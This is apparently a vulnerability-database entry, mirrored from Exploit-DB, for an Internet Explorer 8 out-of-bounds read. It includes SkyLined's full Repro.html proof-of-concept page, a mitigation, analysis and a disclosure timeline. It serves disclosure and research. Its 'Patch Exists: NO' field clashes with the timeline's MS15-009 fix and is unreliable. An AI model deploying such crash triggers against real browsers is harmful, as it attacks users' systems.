Microsoft Internet Explorer 8 Out-of-Bounds Read Vulnerability

vendor:

Internet Explorer

by:

Skylined

4,3

CVSS

MEDIUM

Out-of-Bounds Read Vulnerability

125

CWE

Product Name: Internet Explorer

Affected Version From: Microsoft Internet Explorer 8

Affected Version To: Microsoft Internet Explorer 8

Patch Exists: NO

Related CWE: N/A

CPE: a:microsoft:internet_explorer:8

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2016

Microsoft Internet Explorer 8 Out-of-Bounds Read Vulnerability

A specially crafted web-page can cause Microsoft Internet Explorer 8 to attempt to read data beyond the boundaries of a memory allocation. An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.

Mitigation:

Disabling Javascript should prevent an attacker from triggering the vulnerable code path.

Source

Exploit-DB raw data:

<!--
Source: http://blog.skylined.nl/20161122001.html

Synopsis

A specially crafted web-page can cause Microsoft Internet Explorer 8 to attempt to read data beyond the boundaries of a memory allocation. The issue does not appear to be easily exploitable.

Known affected software, attack vectors and mitigations

Microsoft Internet Explorer 8

An attacker would need to get a target user to open a specially crafted web-page. Disabling Javascript should prevent an attacker from triggering the vulnerable code path.

Repro.html:
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
  <style>
    position_fixed {  position: fixed; }
    position_relative { position: relative;  }
    float_left { float: left; }
    complex { float: left; width: 100%; }
    complex:first-line { clear: left; }
  </style>
  <script>
    window.onload = function boom() {
      oElement_float_left = document.createElement('float_left');
      oElement_complex = document.createElement('complex');
      oElement_position_fixed = document.createElement('position_fixed');
      oElement_position_relative = document.createElement('position_relative');
      oElement_table = document.createElement('table');
      oElement_x = document.createElement('x');
      oTextNode = document.createTextNode('x');
      document.documentElement.appendChild(oElement_float_left);
      oElement_float_left.appendChild(oElement_complex);
      oElement_float_left.appendChild(oTextNode);
      oElement_complex.appendChild(oElement_position_fixed);
      oElement_complex.appendChild(oElement_position_relative);
      oElement_complex.appendChild(oElement_table);
      oElement_complex.appendChild(oElement_x);
      setTimeout(function() {
        oElement_x.setAttribute('class', 'x');
        setTimeout(function() {
          alert();
          document.write(0);
        }, 0);
      }, 0);
    }
  </script>
  </head>
</html>

<!--
Description

The issue requires rather complex manipulation of the DOM and results in reading a value immediately following an object. The lower three bits of this value are returned by the function doing the reading, resulting in a return value in the range 0-7. After exhaustively skipping over the read AV and having that function return each value, no other side effects were noticed. For that reason I assume this issue is hard if not impossible to exploit and did not investigate further. It is still possible that there may be subtle effects that I did not notice that allow exploitation in some form or other.

Time-line

June 2014: This vulnerability was found through fuzzing.
October 2014: This vulnerability was submitted to ZDI.
October 2014: This vulnerability was rejected by ZDI.
November 2014: This vulnerability was reported to MSRC.
February 2015: This vulnerability was addressed by Microsoft in MS15-009.
November 2016: Details of this issue are released.
-->